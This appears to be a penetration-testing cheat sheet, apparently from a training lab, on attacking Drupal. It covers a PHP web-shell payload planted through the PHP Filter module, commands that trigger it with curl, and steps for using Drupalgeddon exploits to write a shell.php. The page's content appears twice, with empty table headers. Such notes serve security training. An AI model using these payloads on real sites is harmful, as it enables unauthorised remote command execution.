Drupal

Introduction

Drupal is Written in PHP, supports MySQL or PostgreSQL for the backend. SQLite can be used if there's no DBMS installed.
Drupal indexes its content using nodes.
A node can hold anything such as a blog post, poll, article, etc.
The page URIs are usually of the form /node/<nodeid>

Drupal Discovery/Footprinting

Command

Description

Attacking Drupal versions prior to version 8 [PHP Filter Module]

In Drupal versions prior to 8, it's possible to login as an admin to enable the PHP Filter Module
The PHP Filter Module basically allows PHP code to always be executed

Follow these steps:

After enabling the module, navigate to Content → Basic Page
Add the following RCE payload: <?phpsystem($_GET['cmd']); ?>
Note: toggle text format → php code in the options below
Gain RCE: curl -s http://drupal-qa.inlanefreight.local/node/3?cmd=id \| grep uid \| cut -f4 -d">"

Attacking Drupal version after version 8 [PHP Filter Module]

Follow these steps:

Download the PHP Filter Module: wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
Once downloaded go to Administration → Reports → Available updates`.
Click on Browse → Select the file → Install.
Follow the same steps as described above (same as drupal version prior to 8)

Drupalgeddon [Drupal RCE Vulnerabilities]

Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon.

Proof of Concept to exploit these vulnerabilities:

Drupalgeddon: https://www.exploit-db.com/exploits/34992 or exploit/multi/http/drupal_drupageddon Metasploit module
Drupalgeddon2: https://www.exploit-db.com/exploits/44448 Usage:
- Run the PoC without edits to check if the vulnerability exists
- To gain RCE, first encode the PHP payload: echo '<?php system($_GET[cmd]);?>' | base64
- Edit the echo line in the PoC as follows: echo "BASE64OUTPUT" | base64 -d | tee shell.php
- Run the script: python3 drupalgeddon2.py
- Gain RCE: curl http://drupal-dev.inlanefreight.local/shell.php?cmd=id
Drupalgeddon3: https://github.com/rithchard/Drupalgeddon3 or https://www.exploit-db.com/exploits/44557/

Last updated 6 months ago

Command

Description

Attacking Drupal versions prior to version 8 [PHP Filter Module]

In Drupal versions prior to 8, it's possible to login as an admin to enable the PHP Filter Module
The PHP Filter Module basically allows PHP code to always be executed

Follow these steps:

After enabling the module, navigate to Content → Basic Page

Add the following RCE payload: <?phpsystem($_GET['cmd']); ?>

Note: toggle text format → php code in the options below

Gain RCE: curl -s http://drupal-qa.inlanefreight.local/node/3?cmd=id \| grep uid \| cut -f4 -d">"

Attacking Drupal version after version 8 [PHP Filter Module]

Follow these steps:

Download the PHP Filter Module: wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Once downloaded go to Administration → Reports → Available updates`.

Click on Browse → Select the file → Install.

Follow the same steps as described above (same as drupal version prior to 8)

Drupalgeddon [Drupal RCE Vulnerabilities]

Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon.

CVE

Versions

Description

Proof of Concept to exploit these vulnerabilities:

Drupalgeddon: https://www.exploit-db.com/exploits/34992 or exploit/multi/http/drupal_drupageddon Metasploit module

Drupalgeddon2: https://www.exploit-db.com/exploits/44448 Usage:

Run the PoC without edits to check if the vulnerability exists
To gain RCE, first encode the PHP payload: echo '<?php system($_GET[cmd]);?>' | base64
Edit the echo line in the PoC as follows: echo "BASE64OUTPUT" | base64 -d | tee shell.php
Run the script: python3 drupalgeddon2.py
Gain RCE: curl http://drupal-dev.inlanefreight.local/shell.php?cmd=id

Drupalgeddon3: https://github.com/rithchard/Drupalgeddon3 or https://www.exploit-db.com/exploits/44557/